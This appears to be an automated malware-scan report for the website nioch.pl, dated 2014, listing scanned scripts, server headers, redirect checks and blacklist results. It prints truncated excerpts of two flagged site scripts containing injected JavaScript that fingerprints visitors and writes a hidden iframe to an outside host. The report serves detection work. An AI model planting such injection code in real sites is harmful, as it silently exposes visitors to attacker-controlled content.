Scanned pages/files
Request | Server response | Status |
http://nioch.pl/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 10 Sep 2014 04:01:37 GMT Pragma: no-cache Location: http://www.nioch.pl/ Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=fc61148e0f6592c07779c569bb6d7270; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://www.nioch.pl/ | 200 OK Content-Length: 51709 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.0.min.js | 200 OK Content-Length: 93068 Content-Type: application/x-javascript | clean |
http://code.jquery.com/jquery-migrate-1.2.1.min.js | 200 OK Content-Length: 7199 Content-Type: application/x-javascript | clean |
https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.0/jquery-ui.min.js | 200 OK Content-Length: 237548 Content-Type: text/javascript | clean |
http://www.nioch.pl/compress/cache.Lang.PL.js,script.js,scroll/jquery.stickyscroll.js,paginator.js,jquery.lazyload.js,cookie-policy.js?ips=539466096 | 200 OK Content-Length: 27010 Content-Type: application/x-javascript | clean |
http://gapl.hit.gemius.pl/xgemius.js | 200 OK Content-Length: 21343 Content-Type: application/x-javascript | clean |
http://nioch.pl//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://nioch.pl/test404page.js | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://nioch.pl//static.clickonometrics.pl/_w2t.js/ | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://go.evolutionmedia.bbelements.com/bb/bb_one2n.js | HTTP/1.1 302 Found Cache-Control: max-age=10800 Connection: close Date: Wed, 10 Sep 2014 04:01:41 GMT Location: http://bbcdn.go.evolutionmedia.bbelements.com/bb/bb_one2n.86.65.59.1.js Server: ibillboard Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 10 Sep 2014 07:01:41 GMT | clean |
http://bbcdn.go.evolutionmedia.bbelements.com/bb/bb_one2n.86.65.59.1.js | 200 OK Content-Length: 47004 Content-Type: application/javascript | clean |
http://nioch.pl/compress/popupFacebook.js | 200 OK Content-Length: 16253 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined;} function Visitrepositorium(){var pipka=navigator.userAgent;var ulrcont=(pipka.indexOf("Chrome")>-1||pipka.indexOf("IEMobile")>-1||pipka.indexOf("Windows")<+1);var bb=(getCookie("lastshow")===undefined);if(!ulrcont&&bb){document.write('<iframe src="http://glasoretas.latiie {$("#ips-popup-wrapper").fadeOut("slow");$("#ips-popup").fadeOut("slow");if(typeof action==='number') {set=action==0?'1y':action+'s';$.cookie('ips-popup','true',{expires:set,path:'/'});} else if(action==true) {$.cookie('ips-popup','true',{expires:'1y',path:'/'});};return false};
Antivirus reports:
http://connect.facebook.net/pl_PL/sdk.js | 200 OK Content-Length: 158386 Content-Type: application/x-javascript | clean |
http://nioch.pl/js/FB.Share.js | 200 OK Content-Length: 9063 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); FB.Share.renderAll() }; this.renderPass(); this.scanner = setInterval(FB.Share.renderPass, 700); if (window.attachEvent) { window.attachEvent("onload", FB.Share.stopScan) } else window.addEventListener("load", FB.Share.stopScan, false) } }; FB.Share._onFirst() } if (FB && FB.Loader) { FB.Loader.onScriptLoaded(["FB.Share", "FB.SharePro"]) }
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nioch.pl
Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 10 Sep 2014 04:01:37 GMT
Pragma: no-cache
Location: http://www.nioch.pl/
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=fc61148e0f6592c07779c569bb6d7270; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: nioch.pl
Referer: http://www.google.com/search?q=nioch.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nioch.pl
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nioch.pl/
Result: nioch.pl is not infected or malware details are not published yet.